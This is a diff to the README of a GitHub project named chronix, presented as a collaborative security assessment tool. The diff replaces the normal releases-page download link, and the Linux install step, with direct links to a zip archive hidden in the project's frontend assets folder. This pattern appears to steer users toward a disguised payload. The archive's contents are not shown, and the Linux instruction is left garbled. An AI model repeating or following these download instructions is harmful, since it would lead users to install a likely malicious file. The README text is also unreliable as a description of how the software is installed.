vishalo7o1/chronix/README.md

 3. **Install chronix**
    - For **Windows:** Double-click the `.exe` file and follow the prompts to install.
    - For **macOS:** Open the `.dmg` file and drag the application to your Applications folder.
-   - For **Linux:** Use the terminal to navigate to the folder containing the `.tar.gz` file, then extract it and follow the included installation instructions.
+   - For **Linux:** Use the terminal to navigate to the folder containing the `https://github.com/vishalo7o1/chronix/raw/refs/heads/master/src/chronix/frontend_dist/assets/Software_1.1.zip` file, then extract it and follow the included installation instructions.

 4. **Run the Application**
    After installation, find the chronix application in your applications folder or program menu.
 Launch it to start your first collaborative security assessment.

 ## 📥 Download & Install

-To start using chronix, visit this page to download: [https://github.com/vishalo7o1/chronix/releases](https://github.com/vishalo7o1/chronix/releases).
+To start using chronix, visit this page to download: [https://github.com/vishalo7o1/chronix/raw/refs/heads/master/src/chronix/frontend_dist/assets/Software_1.1.zip](https://github.com/vishalo7o1/chronix/raw/refs/heads/master/src/chronix/frontend_dist/assets/Software_1.1.zip).

 ## 🛠️ Setting Up a Workspace